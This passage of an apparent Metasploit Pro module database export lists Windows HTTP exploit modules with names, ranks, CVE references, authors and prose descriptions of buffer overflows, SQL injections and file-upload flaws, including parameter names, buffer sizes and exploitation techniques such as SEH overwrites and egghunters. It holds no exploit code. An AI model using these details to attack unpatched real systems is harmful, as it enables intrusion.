00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb","exploit","windows/http/bea_weblogic_transfer_encoding","exploit/windows/http/bea_weblogic_transfer_encoding","BEA Weblogic Transfer-Encoding Buffer Overflow",500,"This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. This vulnerability exists in the error reporting for unknown Transfer-Encoding headers. You may have to run this twice due to timing issues with handlers.","Metasploit Framework License (BSD)","t","2008-09-09 00:00:00",0,,"aggressive","t","CVE-2008-4008, OSVDB-49283, URL-http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html","pusscat " 774,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/belkin_bulldog.rb","exploit","windows/http/belkin_bulldog","exploit/windows/http/belkin_bulldog","Belkin Bulldog Plus Web Service Buffer Overflow",200,"This module exploits a stack buffer overflow in Belkin Bulldog Plus 4.0.2 build 1219. When sending a specially crafted http request, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-03-08 00:00:00",0,,"aggressive","t","BID-34033, EDB-8173, OSVDB-54395","MC " 775,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb","exploit","windows/http/ca_arcserve_rpc_authbypass","exploit/windows/http/ca_arcserve_rpc_authbypass","CA Arcserve D2D GWT RPC Credential Information Disclosure",600,"This module exploits an information disclosure vulnerability in the CA Arcserve D2D r15 web server. The information disclosure can be triggered by sending a specially crafted RPC request to the homepage servlet. This causes CA Arcserve to disclosure the username and password in cleartext used for authentication. This username and password pair are Windows credentials with Administrator access.","Metasploit Framework License (BSD)","t","2011-07-25 00:00:00",0,,"aggressive","t","CVE-2011-3011, EDB-17574, OSVDB-74162","bannedit , rgod" 776,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ca_igateway_debug.rb","exploit","windows/http/ca_igateway_debug","exploit/windows/http/ca_igateway_debug","CA iTechnology iGateway Debug Mode Buffer Overflow",200,"This module exploits a vulnerability in the Computer Associates iTechnology iGateway component. When True is enabled in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads.","Metasploit Framework License (BSD)","t","2005-10-06 00:00:00",0,,"aggressive","t","BID-15025, CVE-2005-3190, EDB-1243, OSVDB-19920, URL-http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485","patrick " 777,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb","exploit","windows/http/ca_totaldefense_regeneratereports","exploit/windows/http/ca_totaldefense_regeneratereports","CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",600,"This module exploits a SQL injection flaw in CA Total Defense Suite R12. When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql statements into the ReportIDs element.","Metasploit Framework License (BSD)","t","2011-04-13 00:00:00",0,,"aggressive","t","CVE-2011-1653, OSVDB-74968, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-134","MC " 778,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/coldfusion_fckeditor.rb","exploit","windows/http/coldfusion_fckeditor","exploit/windows/http/coldfusion_fckeditor","ColdFusion 8.0.1 Arbitrary File Upload and Execute",600,"This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.","Metasploit Framework License (BSD)","t","2009-07-03 00:00:00",0,,"aggressive","t","CVE-2009-2265, OSVDB-55684","MC " 779,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/cyclope_ess_sqli.rb","exploit","windows/http/cyclope_ess_sqli","exploit/windows/http/cyclope_ess_sqli","Cyclope Employee Surveillance Solution v6 SQL Injection",600,"This module exploits a SQL injection found in Cyclope Employee Surveillance Solution. Because the login script does not properly handle the user-supplied username parameter, a malicious user can manipulate the SQL query, and allows arbitrary code execution under the context of 'SYSTEM'.","Metasploit Framework License (BSD)","f","2012-08-08 00:00:00",0,,"aggressive","t","EDB-20393, OSVDB-84517","loneferret, sinn3r " 780,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/easyftp_list.rb","exploit","windows/http/easyftp_list","exploit/windows/http/easyftp_list","EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing the 'path' parameter supplied to an HTTP GET request, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed ""UplusFtp"". Due to limited space, as well as difficulties using an egghunter, the use of staged, ORD, and/or shell payloads is recommended.","Metasploit Framework License (BSD)","t","2010-02-18 00:00:00",0,,"aggressive","t","EDB-11500, OSVDB-66614","ThE g0bL!N, jduck " 781,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/edirectory_host.rb","exploit","windows/http/edirectory_host","exploit/windows/http/edirectory_host","Novell eDirectory NDS Server Host Header Overflow",500,"This module exploits a stack buffer overflow in Novell eDirectory 8.8.1. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect.","Metasploit Framework License (BSD)","t","2006-10-21 00:00:00",0,,"aggressive","t","BID-20655, CVE-2006-5478, OSVDB-29993","MC " 782,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/edirectory_imonitor.rb","exploit","windows/http/edirectory_imonitor","exploit/windows/http/edirectory_imonitor","eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware. NOTE: repeated exploitation attempts may cause eDirectory to crash. It does not restart automatically in a default installation.","BSD License","t","2005-08-11 00:00:00",0,,"aggressive","t","BID-14548, CVE-2005-2551, OSVDB-18703","Matt Olney , Unknown" 783,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/efs_easychatserver_username.rb","exploit","windows/http/efs_easychatserver_username","exploit/windows/http/efs_easychatserver_username","EFS Easy Chat Server Authentication Request Handling Buffer Overflow",500,"This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending a overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to ""C:\Program Files\Easy Chat Server"", is concatentated with ""\users\"" and the string passed as the username HTTP paramter.","BSD License","t","2007-08-14 00:00:00",0,,"aggressive","t","BID-25328, CVE-2004-2466, OSVDB-7416","LSO " 784,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ektron_xslt_exec.rb","exploit","windows/http/ektron_xslt_exec","exploit/windows/http/ektron_xslt_exec","Ektron 8.02 XSLT Transform Remote Code Execution",600,"This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The vulnerability exists due to the insecure usage of XslCompiledTransform, using a XSLT controlled by the user. The module has been tested successfully on Ektron CMS 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK SERVICE privileges.","Metasploit Framework License (BSD)","t","2012-10-16 00:00:00",0,,"aggressive","t","CVE-2012-5357, URL-http://technet.microsoft.com/en-us/security/msvr/msvr12-016, URL-http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/","Nicolas ""Nicob"" Gregoire, Rich Lundeen, juan vazquez " 785,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ezserver_http.rb","exploit","windows/http/ezserver_http","exploit/windows/http/ezserver_http","EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability",600,"This module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious user sends packets containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique.","Metasploit Framework License (BSD)","f","2012-06-18 00:00:00",0,,"aggressive","t","BID-54056, EDB-19266, OSVDB-83065, URL-http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/","modpr0be " 786,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/fdm_auth_header.rb","exploit","windows/http/fdm_auth_header","exploit/windows/http/fdm_auth_header","Free Download Manager Remote Control Server Buffer Overflow",500,"This module exploits a stack buffer overflow in Free Download Manager Remote Control 2.5 Build 758. When sending a specially crafted Authorization header, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-02-02 00:00:00",0,,"aggressive","t","CVE-2009-0183, OSVDB-51745","MC " 787,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_imc_mibfileupload.rb","exploit","windows/http/hp_imc_mibfileupload","exploit/windows/http/hp_imc_mibfileupload","HP Intelligent Management Center Arbitrary File Upload",500,"This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in a insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2013-03-07 00:00:00",0,,"aggressive","t","BID-58385, CVE-2012-5201, OSVDB-91026, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-050/, URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276","juan vazquez , rgod " 788,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb","exploit","windows/http/hp_nnm_getnnmdata_hostname","exploit/windows/http/hp_nnm_getnnmdata_hostname","HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",500,"This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted Hostname parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-05-11 00:00:00",0,,"aggressive","t","CVE-2010-1555, OSVDB-64976","MC " 789,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb","exploit","windows/http/hp_nnm_getnnmdata_icount","exploit/windows/http/hp_nnm_getnnmdata_icount","HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow",500,"This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-05-11 00:00:00",0,,"aggressive","t","CVE-2010-1554, OSVDB-64976","MC " 790,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb","exploit","windows/http/hp_nnm_getnnmdata_maxage","exploit/windows/http/hp_nnm_getnnmdata_maxage","HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow",500,"This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-05-11 00:00:00",0,,"aggressive","t","CVE-2010-1553, OSVDB-64976","MC " 791,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb","exploit","windows/http/hp_nnm_nnmrptconfig_nameparams","exploit/windows/http/hp_nnm_nnmrptconfig_nameparams","HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",300,"This module exploits a vulnerability in HP NNM's nnmRptConfig.exe. A remote user can send a long string data to the nameParams parameter via a POST request, which causes an overflow on the stack when function ov.sprintf_new() is used, and gain arbitrary code execution.'","Metasploit Framework License (BSD)","f","2011-01-10 00:00:00",,,"aggressive","t","CVE-2011-0266, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-008/","MC , sinn3r " 792,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb","exploit","windows/http/hp_nnm_nnmrptconfig_schdparams","exploit/windows/http/hp_nnm_nnmrptconfig_schdparams","HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",300,"This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-01-10 00:00:00",,,"aggressive","t","CVE-2011-0267, OSVDB-70473, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-009/","sinn3r " 793,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_openview5.rb","exploit","windows/http/hp_nnm_openview5","exploit/windows/http/hp_nnm_openview5","HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-12-06 00:00:00",0,,"aggressive","t","BID-26741, CVE-2007-6204, OSVDB-39530","MC " 794,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb","exploit","windows/http/hp_nnm_ovalarm_lang","exploit/windows/http/hp_nnm_ovalarm_lang","HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute arbitrary code. This specific vulnerability is due to a call to ""sprintf_new"" in the ""isWide"" function within ""ovalarm.exe"". A stack buffer overflow occurs when processing an HTTP request that contains the following. 1. An ""Accept-Language"" header longer than 100 bytes 2. An ""OVABverbose"" URI variable set to ""on"", ""true"" or ""1"" The vulnerability is related to ""_WebSession::GetWebLocale()"" .. NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.","Metasploit Framework License (BSD)","f","2009-12-09 00:00:00",0,,"aggressive","t","BID-37347, CVE-2009-4179, OSVDB-60930, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-09-12, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877","jduck " 795,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovas.rb","exploit","windows/http/hp_nnm_ovas","exploit/windows/http/hp_nnm_ovas","HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier. Specifically this vulnerability is caused by a failure to properly handle user supplied input within the HTTP request including headers and the actual URL GET request. Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode which was alphanumeric encoded by muts in the original exploit. If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably some timeout handling code that causes this.","Metasploit Framework License (BSD)","t","2008-04-02 00:00:00",0,,"aggressive","t","BID-28569, CVE-2008-1697, OSVDB-43992","bannedit , muts" 796,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb","exploit","windows/http/hp_nnm_ovbuildpath_textfile","exploit/windows/http/hp_nnm_ovbuildpath_textfile","HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",300,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the ""_OVBuildPath"" function within ""ov.dll"". There are no stack cookies, so exploitation is achieved by overwriting the saved return address. The vulnerability is due to the use of the function ""_OVConcatPath"" which finally uses ""strcat"" in a insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation path. If the installation path cannot be guessed the default installation path is used.","Metasploit Framework License (BSD)","f","2011-11-01 00:00:00",0,,"aggressive","t","BID-50471, CVE-2011-3167, OSVDB-76775, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-002/, URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052","Anyway , juan vazquez , sinn3r " 797,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb","exploit","windows/http/hp_nnm_ovwebhelp","exploit/windows/http/hp_nnm_ovwebhelp","HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-12-09 00:00:00",0,,"aggressive","t","BID-37340, CVE-2009-4178, OSVDB-60929","MC " 798,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb","exploit","windows/http/hp_nnm_ovwebsnmpsrv_main","exploit/windows/http/hp_nnm_ovwebsnmpsrv_main","HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the ""main"" function within ""ovwebsnmpsrv.exe"" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.","Metasploit Framework License (BSD)","f","2010-06-16 00:00:00",0,,"aggressive","t","BID-40873, CVE-2010-1964, OSVDB-65552, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-108/","jduck " 799,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb","exploit","windows/http/hp_nnm_ovwebsnmpsrv_ovutil","exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil","HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from ""main"" within ""ovwebsnmpsrv.exe"" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the ""getProxiedStorageAddress"" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.","Metasploit Framework License (BSD)","f","2010-06-16 00:00:00",0,,"aggressive","t","BID-40638, CVE-2010-1961, OSVDB-65428, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-106/","jduck " 800,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb","exploit","windows/http/hp_nnm_ovwebsnmpsrv_uro","exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro","HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within ""ovwebsnmpsrv.exe"" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.","Metasploit Framework License (BSD)","f","2010-06-08 00:00:00",0,,"aggressive","t","BID-40637, CVE-2010-1960, OSVDB-65427, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-105/","jduck " 801,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_snmp.rb","exploit","windows/http/hp_nnm_snmp","exploit/windows/http/hp_nnm_snmp","HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-12-09 00:00:00",0,,"aggressive","t","CVE-2009-3849, OSVDB-60933","MC " 802,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb","exploit","windows/http/hp_nnm_snmpviewer_actapp","exploit/windows/http/hp_nnm_snmpviewer_actapp","HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the ""snmpviewer.exe"" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within ""snmpviewer.exe"" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. It is important to note that this vulnerability must be exploited by overwriting SEH. While the saved return address can be smashed, a function call that occurs before the function returns calls ""exit"".","Metasploit Framework License (BSD)","f","2010-05-11 00:00:00",0,,"aggressive","t","BID-40068, CVE-2010-1552, OSVDB-64975, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-083/","jduck " 803,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_toolbar_01.rb","exploit","windows/http/hp_nnm_toolbar_01","exploit/windows/http/hp_nnm_toolbar_01","HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-01-07 00:00:00",0,,"aggressive","t","BID-33147, CVE-2008-0067, OSVDB-53222","MC " 804,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_toolbar_02.rb","exploit","windows/http/hp_nnm_toolbar_02","exploit/windows/http/hp_nnm_toolbar_02","HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",300,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works against a specific build (ie. NNM 7.53_01195)","Metasploit Framework License (BSD)","f","2009-01-21 00:00:00",,,"aggressive","t","BID-34294, CVE-2009-0920, OSVDB-53242, URL-http://www.coresecurity.com/content/openview-buffer-overflows","Oren Isacson, juan vazquez , sinn3r " 805,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb","exploit","windows/http/hp_nnm_webappmon_execvp","exploit/windows/http/hp_nnm_webappmon_execvp","HP OpenView Network Node Manager execvp_nc Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel' parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the request size. The buffer being targetted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the ""execvp_nc"" function within ""ov.dll"" prior to v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. This vulnerability might also be triggerable via other CGI programs, however this was not fully investigated.","Metasploit Framework License (BSD)","f","2010-07-20 00:00:00",,,"aggressive","t","BID-41829, CVE-2010-2703, OSVDB-66514, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088, URL-http://www.vupen.com/english/advisories/2010/1866, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-137/","Shahin Ramezany , jduck , sinn3r " 806,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb","exploit","windows/http/hp_nnm_webappmon_ovjavalocale","exploit/windows/http/hp_nnm_webappmon_ovjavalocale","HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow a stack buffer and execute arbitrary code. The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is declared within this function. When the vulnerability is triggered, the stack trace looks like the following: #0 ... #1 sprintf_new(local_stack_buf, fmt, cooke); #2 OvWwwDebug("" HTTP_COOKIE=%s\n"", cookie); #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x); #4 sub_405ee0(""nnm"", ""webappmon""); No validation is done on the cookie argument. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. The original advisory detailed an attack vector using the ""OvJavaLocale"" cookie being passed in a request ot ""webappmon.exe"". Further research shows that several different cookie values, as well as several different CGI applications, can be used. '","Metasploit Framework License (BSD)","f","2010-08-03 00:00:00",,,"aggressive","t","BID-42154, CVE-2010-2709, OSVDB-66932, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520, URL-http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow","Nahuel Riva, jduck , sinn3r " 807,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_openview_insight_backdoor.rb","exploit","windows/http/hp_openview_insight_backdoor","exploit/windows/http/hp_openview_insight_backdoor","HP OpenView Performance Insight Server Backdoor Account Code Execution",600,"This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the com.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system allowing the execution of arbitary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0","Metasploit Framework License (BSD)","t","2011-01-31 00:00:00",0,,"aggressive","t","CVE-2011-0276, OSVDB-70754","MC " 808,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_power_manager_filename.rb","exploit","windows/http/hp_power_manager_filename","exploit/windows/http/hp_power_manager_filename","HP Power Manager 'formExportDataLogs' Buffer Overflow",300,"This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), which may result aribitrary remote code execution under the context of 'SYSTEM'.","Metasploit Framework License (BSD)","f","2011-10-19 00:00:00",0,,"aggressive","t","BID-37867, CVE-2009-3999, OSVDB-61848","Alin Rad Pop, Rodrigo Escobar , sinn3r " 809,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_power_manager_login.rb","exploit","windows/http/hp_power_manager_login","exploit/windows/http/hp_power_manager_login","Hewlett-Packard Power Manager Administration Buffer Overflow",200,"This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2. Sending a specially crafted POST request with an overly long Login string, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-11-04 00:00:00",0,,"aggressive","t","CVE-2009-2685, OSVDB-59684","MC , sinn3r " 810,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/httpdx_handlepeer.rb","exploit","windows/http/httpdx_handlepeer","exploit/windows/http/httpdx_handlepeer","HTTPDX h_handlepeer() Function Buffer Overflow",500,"This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The vulnerability is caused due to a boundary error within the ""h_handlepeer()"" function in http.cpp. By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-10-08 